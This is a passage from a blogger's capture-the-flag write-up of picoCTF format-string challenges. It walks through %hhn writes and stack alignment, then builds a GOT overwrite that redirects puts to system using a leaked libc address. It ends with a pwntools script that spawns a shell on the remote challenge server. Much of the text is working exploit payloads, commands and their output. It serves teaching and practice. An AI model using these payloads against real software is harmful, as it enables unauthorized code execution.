We were not writting into 0×404060
, but 0x6100000000004040
. So if we prefix one A
before our format string, "A%15$hhn"
has a size of 8 (multiple of a stack slot), so the size of our input is effectively stack-aligned:
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"A%15$hhn"+"\x60\x40\x40\x00\x00\x00\x00\x00"+"\x61\x40\x40\x00\x00\x00\x00\x00"+"\x62\x40\x40\x00\x00\x00\x00\x00"+"\x63\x40\x40\x00\x00\x00\x00\x00"')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: A`@@
sus = 0x21737501
You can do better!
See that we overwrote the first value of sus
to 01
, which is the length of the output "A"
‘s size.
Even better, we might prefix 0 in the %N$
specifier so we don’t output extra characters, easing our future calculations:
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"%015$hhn"+"\x60\x40\x40\x00\x00\x00\x00\x00"+"\x61\x40\x40\x00\x00\x00\x00\x00"+"\x62\x40\x40\x00\x00\x00\x00\x00"+"\x63\x40\x40\x00\x00\x00\x00\x00"')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: `@@
sus = 0x21737500
You can do better!
Finally, as our payload increases, the stack’s slots locations will increase as well ! For example, the second address (0×404061
) below is in the 16th slot:
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"%0016$lx"+"\x60\x40\x40\x00\x00\x00\x00\x00"+"\x61\x40\x40\x00\x00\x00\x00\x00"+"\x62\x40\x40\x00\x00\x00\x00\x00"+"\x63\x40\x40\x00\x00\x00\x00\x00"')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: 404061`@@
sus = 0x21737573
You can do better!
But if we prefix 8 characters in the beginning of our string, it’ll be located 1 slot further naturally (i.e. from the 16th to the 17th):
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"%000000000017$lx"+"\x60\x40\x40\x00\x00\x00\x00\x00"+"\x61\x40\x40\x00\x00\x00\x00\x00"+"\x62\x40\x40\x00\x00\x00\x00\x00"+"\x63\x40\x40\x00\x00\x00\x00\x00"')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: 404061`@@
sus = 0x21737573
You can do better!
sus == 0x67616c66
Therefore, we might use all that knowledge to construct our payload to write 0×67616c66
into sus
at 0×404060
:
jamarir@kali:~$ python -c 'print(f"+{0x66} -> +{0x6c - 0x66} -> +{0x161 - 0x6c} -> +{0x167 - 0x161}")'
+102 -> +6 -> +245 -> +6
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"%0000102c%16$hhn"+"\x60\x40\x40\x00\x00\x00\x00\x00"+"\x61\x40\x40\x00\x00\x00\x00\x00"+"\x62\x40\x40\x00\x00\x00\x00\x00"+"\x63\x40\x40\x00\x00\x00\x00\x00"')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: 0`@@
sus = 0x21737566
You can do better!
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"%0000102c%18$hhn"+"%0000006c%19$hhn"+"\x60\x40\x40\x00\x00\x00\x00\x00"+"\x61\x40\x40\x00\x00\x00\x00\x00"+"\x62\x40\x40\x00\x00\x00\x00\x00"+"\x63\x40\x40\x00\x00\x00\x00\x00"')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: 0 `@@
sus = 0x21736c66
You can do better!
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"%0000102c%20$hhn"+"%0000006c%21$hhn"+"%0000245c%22$hhn"+"\x60\x40\x40\x00\x00\x00\x00\x00"+"\x61\x40\x40\x00\x00\x00\x00\x00"+"\x62\x40\x40\x00\x00\x00\x00\x00"+"\x63\x40\x40\x00\x00\x00\x00\x00"')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: 0 `@@
sus = 0x21616c66
You can do better!
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"%0000102c%22$hhn"+"%0000006c%23$hhn"+"%0000245c%24$hhn"+"%0000006c%25$hhn"+"\x60\x40\x40\x00\x00\x00\x00\x00"+"\x61\x40\x40\x00\x00\x00\x00\x00"+"\x62\x40\x40\x00\x00\x00\x00\x00"+"\x63\x40\x40\x00\x00\x00\x00\x00"')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: 0
`@@
I have NO clue how you did that, you must be a wizard. Here you go...
flagusator
And here’s the server-side flag :D
jamarir@kali:~$ nc rhea.picoctf.net 52261 <<<$(python2 -c 'print"%0000102c%22$hhn"+"%0000006c%23$hhn"+"%0000245c%24$hhn"+"%0000006c%25$hhn"+"\x60\x40\x40\x00\x00\x00\x00\x00"+"\x61\x40\x40\x00\x00\x00\x00\x00"+"\x62\x40\x40\x00\x00\x00\x00\x00"+"\x63\x40\x40\x00\x00\x00\x00\x00"')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: u `@@
I have NO clue how you did that, you must be a wizard. Here you go...
picoCTF{f0[...]cc}
Format String 3
This program doesn't contain a win function. How can you win?
Download the binary here. Download the source here. Download libc here, download the interpreter here.
Run the binary with these two files present in the same directory.
Program Execution
That's the final boss. When executed, we're asked to enter a string. Putting “test” shows:
jamarir@kali:~$ ./format-string-3
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7ffff7e5a3f0
test
test
/bin/sh
Libs are used locally for the program to run. Otherwise, the program cannot execute:
jamarir@kali:~$ rm -f ld-linux-x86-64.so.2 libc.so.6
jamarir@kali:~$ ./format-string-3
zsh: no such file or directory: ./format-string-3
Source Code
First, the code sets the variables all_strings
and buf
to NULL:
[...]
#define MAX_STRINGS 32
[...]
int main() {
char *all_strings[MAX_STRINGS] = {NULL};
char buf[1024] = {'\0'};
[...]
Then, it calls a setvbuf()
function, and prints some texts:
[...]
void setup() {
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
}
void hello() {
puts("Howdy gamers!");
printf("Okay I'll be nice. Here's the address of setvbuf in libc: %p\n", &setvbuf);
}
int main() {
[...]
setup();
hello();
[...]
}
Below, we see again that a vulnerable printf()
call is performed:
int main() {
[...]
fgets(buf, 1024, stdin);
printf(buf);
[...]
}
Finally, the /bin/sh
string is written into stdout using the puts()
function:
[...]
char *normal_string = "/bin/sh";
[...]
int main() {
[...]
puts(normal_string);
[...]
}
We know the program being a 64 bit executable:
jamarir@kali:~$ file format-string-3
format-string-3: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter ./ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=54e1c4048a725df868e9a10dc975a46e8d8e5e92, not stripped
Therefore, we may exploit the format string bug and disclose the stack’s slots with %lx
:
jamarir@kali:~$ ./format-string-3 <<<$(python2 -c 'print"%lx-"*5')
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7ffff7e5a3f0
7ffff7fb8963-fbad208b-7fffffffd6a0-1-0-
/bin/sh
PLT → GOT → system()
But what now ? For some reasons, the program tells us where the locally loaded libc’s setvbuf()
function is. Also, the /bin/bash
is globally set:
#include <stdio.h>
#define MAX_STRINGS 32
char *normal_string = "/bin/sh";
So we might guess that we want to spawn a shell. But the stack isn't executable, so we can’t inject a shellcode in our input:
jamarir@kali:~$ readelf -l format-string-3
[...]
GNU_STACK 0x0000000000001000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 RW 0x10
[...]
Looking at the hint:
We must change a function's pointer. That's pretty clear now, we must call system("/bin/bash")
, replacing the last puts(normal_string)
with system(normal_string)
.
#include <stdlib.h>
int main() {
system("/bin/bash");
return 0;
}
jamarir@kali:~$ gcc system.c -o system
jamarir@kali:~$ echo 'whoami' |./system
jamarir
Replacing the puts
’s address is possible by changing its GOT (Global Offset Table) entry. In a nutshell, when a libc function is called, it jumps to the function’s Process Linkage Table
, which itself jumps to the associated GOT entry:
jamarir@kali:~$ objdump -M intel -j .text -d format-string-3
[...]
4012e8: 48 8b 05 59 2d 00 00 mov rax,QWORD PTR [rip+0x2d59] # 404048 <normal_string>
4012ef: 48 89 c7 mov rdi,rax
4012f2: e8 89 fd ff ff call 401080 <puts@plt>
[...]
jamarir@kali:~$ objdump -M intel -d format-string-3
[...]
Disassembly of section .plt.got:
0000000000401070 <setvbuf@plt>:
401070: f3 0f 1e fa endbr64
401074: f2 ff 25 7d 2f 00 00 bnd jmp QWORD PTR [rip+0x2f7d] # 403ff8 <setvbuf@GLIBC_2.2.5>
40107b: 0f 1f 44 00 00 nop DWORD PTR [rax+rax*1+0x0]
Disassembly of section .plt.sec:
0000000000401080 <puts@plt>:
401080: f3 0f 1e fa endbr64
401084: f2 ff 25 8d 2f 00 00 bnd jmp QWORD PTR [rip+0x2f8d] # 404018 <puts@GLIBC_2.2.5>
40108b: 0f 1f 44 00 00 nop DWORD PTR [rax+rax*1+0x0]
[...]
jamarir@kali:~$ objdump --dynamic-reloc format-string-3
format-string-3: file format elf64-x86-64
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
0000000000403fe8 R_X86_64_GLOB_DAT __libc_start_main@GLIBC_2.34
0000000000403ff0 R_X86_64_GLOB_DAT __gmon_start__@Base
0000000000403ff8 R_X86_64_GLOB_DAT setvbuf@GLIBC_2.2.5
0000000000404060 R_X86_64_COPY stdout@GLIBC_2.2.5
0000000000404070 R_X86_64_COPY stdin@GLIBC_2.2.5
0000000000404080 R_X86_64_COPY stderr@GLIBC_2.2.5
0000000000404018 R_X86_64_JUMP_SLOT puts@GLIBC_2.2.5
0000000000404020 R_X86_64_JUMP_SLOT __stack_chk_fail@GLIBC_2.4
0000000000404028 R_X86_64_JUMP_SLOT printf@GLIBC_2.2.5
0000000000404030 R_X86_64_JUMP_SLOT fgets@GLIBC_2.2.5
As we can see:
First, the
<puts@plt>
entry function is called, making the program jump to0×401080
.Second, this jump leads to the instruction at
0×401084
. This instruction performs a jump to the content of the memory atrip + 0×2f8d = 0x40108b + 0×2f8d = 0×404018
. It turns out that this latest memory is the GOT’s<puts@GLIBC_2.2.5>
entry, forputs()
to be executed.
Note that because we control the printf()
function, we may exploit any GOT entry call that is performed AFTERWARDS only. Here, it means that we may detour the program’s execution altering the puts()
GOT entry alone, whereas we can’t exploit an fgets()
GOT alteration:
[...]
int main() {
[...]
fgets(buf, 1024, stdin);
printf(buf);
puts(normal_string);
return 0;
}
Write Where ?
So far, we know we want to edit the puts()
’s instruction address. So we want to write something into the address 0×404018
.
Write What ? libc base & offsets.
Now we need to figure out what to write. We want to write the system()
’s address that’ll be used at runtime. The setvbuf()
and system()
functions, in the libc library, are at offset 0x7a3f0
and 0x4f760
respectively:
jamarir@kali:~$ nm -D libc.so.6 |grep -E ' (setvbuf|system)@'
000000000007a3f0 W setvbuf@@GLIBC_2.2.5
000000000004f760 W system@@GLIBC_2.2.5
Therefore, we know that system()
is placed 0x2ac90
before setvbuf()
. Also, considering that the setvbuf()
's address at runtime is 0x7ffff7e5a3f0
:
jamarir@kali:~$ ./format-string-3
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7ffff7e5a3f0
We know that the libc’s base is 0x7ffff7de0000
. Then, if we want to write the system()
address, we’ll be writting either:
0x7ffff7e5a3f0 - 0x2ac90
, i.e.0x7ffff7e2f760
.0x7ffff7de0000 + 0x4f760
, i.e.0x7ffff7e2f760
.
Finally, notice that we wanna alter only the 3 lower bytes of 0×404018
. That’s because the upper bytes of any libc function are the same, i.e. 0×7ffff7??????
. Said differently, any offset in the GOT alters, at the maximum, the 3 lower bytes of the libc’s base only:
jamarir@kali:~$ nm -D libc.so.6 |awk -F' ' '{print $1}' |grep -oP '^0+\K[0-9a-z]+'
3f7e0
263e1
1d9b40
[...]
111640
111640
jamarir@kali:~$ for i in $(nm -D libc.so.6 |awk -F' ' '{print $1}' |grep -oP '^0+\K[0-9a-z]+'); do
expr length $i;
done |sort -u
1
2
5
6
Basic Dummy Writting
With the following payload, we’d need 38 stackpops to reach our input:
jamarir@kali:~$ ./format-string-3 <<<$(python2 -c 'print"AAAAAAAA"+"%lx-"*38')
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7ffff7e5a3f0
AAAAAAAA7ffff7fb8963-[...]-0-4141414141414141-
/bin/sh
We wanna write 0x7ffff7e2f760
into 0×404018
. So again, we’ll suffix these addresses, being conscious of the necessary stack alignements (e.g. %039$
):
jamarir@kali:~$ ./format-string-3 <<<$(python2 -c 'print"%039$lx-"+"\x18\x40\x40\x00\x00\x00\x00\x00"+"\x19\x40\x40\x00\x00\x00\x00\x00"+"\x20\x40\x40\x00\x00\x00\x00\x00"')
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7ffff7e5a3f0
404018-@@/bin/sh
We may check that each address is in its respective slot:
jamarir@kali:~$ ./format-string-3 <<<$(python2 -c 'print"%041$lx-"+"%042$lx-"+"%043$lx-"+"\x18\x40\x40\x00\x00\x00\x00\x00"+"\x19\x40\x40\x00\x00\x00\x00\x00"+"\x20\x40\x40\x00\x00\x00\x00\x00"')
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7ffff7e5a3f0
404018-404019-404020-@@/bin/sh
Great ! Let's perform our first writting:
jamarir@kali:~$ ./format-string-3 <<<$(python2 -c 'print"%039$hhn"+"\x18\x40\x40\x00\x00\x00\x00\x00"+"\x19\x40\x40\x00\x00\x00\x00\x00"+"\x20\x40\x40\x00\x00\x00\x00\x00"')
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7ffff7e5a3f0
[1] 578627 segmentation fault ./format-string-3 <<<
We have a segmentation fault. That's most likely because our instruction pointer rip
is pointing to an area that doesn’t contain a valid instruction. In order to debug the overwritten address locally, let's first generate a core dump file:
jamarir@kali:~$ ulimit -c 100000; sudo sysctl -w kernel.core_pattern=./core
And perform the above segfault again. If we open the core dump in gdb, we may analyze the overwritten stack's value:
jamarir@kali:~$ gdb -q ./format-string-3 core.585809 2>/dev/null
[...]
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x00007ffff7e695fd in ?? () from ./libc.so.6
(gdb) x/2xw 0x404018
0x404018 <puts@got.plt>: 0xf7e59b00 0x00007fff
Here, we see that the puts()
’s GOT entry is set to 0x00007ffff7e59b00
, where the lower byte has been ovewritten to 0×00
(empty output’s size). We may use the following one-liner to debug the puts()
’s GOT entry more easily:
jamarir@kali:~$ rm -f core.* 1>/dev/null 2>/dev/null; ./format-string-3 <<<$(python2 -c 'print"A"+"%39$hhn"+"\x18\x40\x40\x00\x00\x00\x00\x00"+"\x19\x40\x40\x00\x00\x00\x00\x00"+"\x20\x40\x40\x00\x00\x00\x00\x00"'); echo exit |gdb -q ./format-string-3 core.* -ex 'x/2xw 0x404018' 2>/dev/null |grep '^0x'
[...]
0x404018 <puts@got.plt>: 0xf7e59b01 0x00007fff
See the last byte of 0x404018
is 01
, the length of the unique printed character before %39$hhn
: "A".
puts2system("/bin/bash")
Again, we wanna write 0x7ffff7e2f760
into 0×404018
. So using the following calculations:
jamarir@kali:~$ python -c 'print(f"+{0x60} -> +{0xf7 - 0x60} -> +{0x1e2 - 0xf7}")'
+96 -> +151 -> +235
We can overwrite the address:
0x404018
with the byte0×60
, adding 96 characters:
jamarir@kali:~$ rm -f core.* 1>/dev/null 2>/dev/null; ./format-string-3 <<<$(python2 -c 'print"%0000096c%40$hhn"+"\x18\x40\x40\x00\x00\x00\x00\x00"+"\x19\x40\x40\x00\x00\x00\x00\x00"+"\x20\x40\x40\x00\x00\x00\x00\x00"'); echo exit |gdb -q ./format-string-3 core.* -ex 'x/2xw 0x404018' 2>/dev/null |grep '^0x'
[...] c@@[1] 619351 segmentation fault (core dumped) ./format-string-3 <<<
0x404018 <puts@got.plt>: 0xf7e59b60 0x00007fff
0x404019
with the byte0×f7
, adding 151 characters:
jamarir@kali:~$ rm -f core.* 1>/dev/null 2>/dev/null; ./format-string-3 <<<$(python2 -c 'print"%0000096c%42$hhn"+"%0000151c%43$hhn"+"\x18\x40\x40\x00\x00\x00\x00\x00"+"\x19\x40\x40\x00\x00\x00\x00\x00"+"\x20\x40\x40\x00\x00\x00\x00\x00"'); echo exit |gdb -q ./format-string-3 core.* -ex 'x/2xw 0x404018' 2>/dev/null |grep '^0x'
[...]
0x404018 <puts@got.plt>: 0xf7e5f760 0x00007fff
0x404020
with the byte0×(1)e2
, adding 235 characters:
jamarir@kali:~$ rm -f core.* 1>/dev/null 2>/dev/null; ./format-string-3 <<<$(python2 -c 'print"%0000096c%44$hhn"+"%0000151c%45$hhn"+"%0000235c%46$hhn"+"\x18\x40\x40\x00\x00\x00\x00\x00"+"\x19\x40\x40\x00\x00\x00\x00\x00"+"\x20\x40\x40\x00\x00\x00\x00\x00"'); echo exit |gdb -q ./format-string-3 core.* -ex 'x/2xw 0x404018' 2>/dev/null |grep '^0x'
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7ffff7e5a3f0
c @@*** stack smashing detected ***: terminated
[1] 627952 IOT instruction (core dumped) ./format-string-3 <<<
0x404018 <puts@got.plt>: 0xf7e5f760 0x00007fff
oO ?! Strangely, there’s a stack smashing detection (in the far right of the above code block). Alternatively, we might try to reduce our input’s size by writting 0xe2f7
directly into 0x404019
, along with %hn
:
jamarir@kali:~$ python -c 'print(f"+{0x60} -> +{0xe2f7 - 0x60}")'
+96 -> +58007
jamarir@kali:~$ ./format-string-3 <<<$(python2 -c 'print"%0000096c%42$hhn"+"%00058007c%43$hn"+"\x18\x40\x40\x00\x00\x00\x00\x00"+"\x19\x40\x40\x00\x00\x00\x00\x00"');
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7ffff7e5a3f0
[...] @@
We have no more segmentation fault ! This is likely because our shell spawned. Using the cat + pipe
trick allows us to grab an interactive shell and execute arbitrary code:
jamarir@kali:~$ (python2 -c 'print"%0000096c%42$hhn"+"%00058007c%43$hn"+"\x18\x40\x40\x00\x00\x00\x00\x00"+"\x19\x40\x40\x00\x00\x00\x00\x00"'; cat) |./format-string-3
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7ffff7e5a3f0
[...] @@echo 'Hello World!'
Hello World!
^C
Pwntools’s fmtstr()
However, this payload won’t work server-side, as ASLR is enabled. See that the libc’s base change between each execution:
jamarir@kali:~$ echo test |nc rhea.picoctf.net 58731
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7cd79084a3f0
test
/bin/sh
jamarir@kali:~$ echo test |nc rhea.picoctf.net 58731
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x79ce907cc3f0
test
/bin/sh
Therefore, we have to construct our payload on-the-fly, using the disclosed setvbuf
address. Fortunately, a tool named pwntools
generates the dynamic format string payload for us.
First, we attach to the remote process and set the binary’s context:
import pwn #p = pwn.process("./format-string-3") p = pwn.remote("rhea.picoctf.net", 58731) pwn.context.binary = pwn.ELF('./format-string-3')
Second, we grab the
setvbuf()
’s leaked address, and update the remote libc’s base accordingly:setvbuf_addr = int(p.recvregex(br'libc: 0x([0-9a-f]+)\n', capture=True).group(1), 16) libc = pwn.ELF("./libc.so.6") libc.address = setvbuf_addr - libc.symbols['setvbuf']
Third, we construct the format string payload to write
system()
into0×404018
, knowing that 38 stackpops are required. To avoid hard-coding0×404018
, we grab theputs
’s GOT entry from the binary:payload = pwn.fmtstr_payload(38, {pwn.context.binary.got['puts'] : libc.symbols['system']}) info(f"Payload: '{payload}'")
Finally, we send the payload in stdin and grab an interactive process session:
p.sendline(payload) p.interactive()
GG WP !
jamarir@kali:~$ python fmt.py
[+] Opening connection to rhea.picoctf.net on port 58731: Done
[*] '/home/jamarir/[...]/format-string-3'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x3ff000)
RUNPATH: b'.'
SHSTK: Enabled
IBT: Enabled
Stripped: No
[*] '/home/jamarir/[...]/libc.so.6'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
SHSTK: Enabled
IBT: Enabled
[*] Payload: 'b'%96c%47$lln%22c%48$hhn%17c%49$hhn%15c%50$hhn%60c%51$hhn%42c%52$hhnaaaaba\x18@@\x00\x00\x00\x00\x00\x1d@@\x00\x00\x00\x00\x00\x19@@\x00\x00\x00\x00\x00\x1a@@\x00\x00\x00\x00\x00\x1b@@\x00\x00\x00\x00\x00\x1c@@\x00\x00\x00\x00\x00''
[*] Switching to interactive mode
c \x8b 0 \x01 \x00 \x00aaaaba\x18@@$ l ls ls
Makefile
artifacts.tar.gz
flag.txt
format-string-3
format-string-3.c
ld-linux-x86-64.so.2
libc.so.6
metadata.json
profile
$ cat flag.txt
picoCTF{G0[...]f5}$
Subscribe to my newsletter
Read articles from jamarir directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by

jamarir
jamarir
Jamaledine AMARIR. Pentester, CTF Player, Game Modding enthusiast | CRTO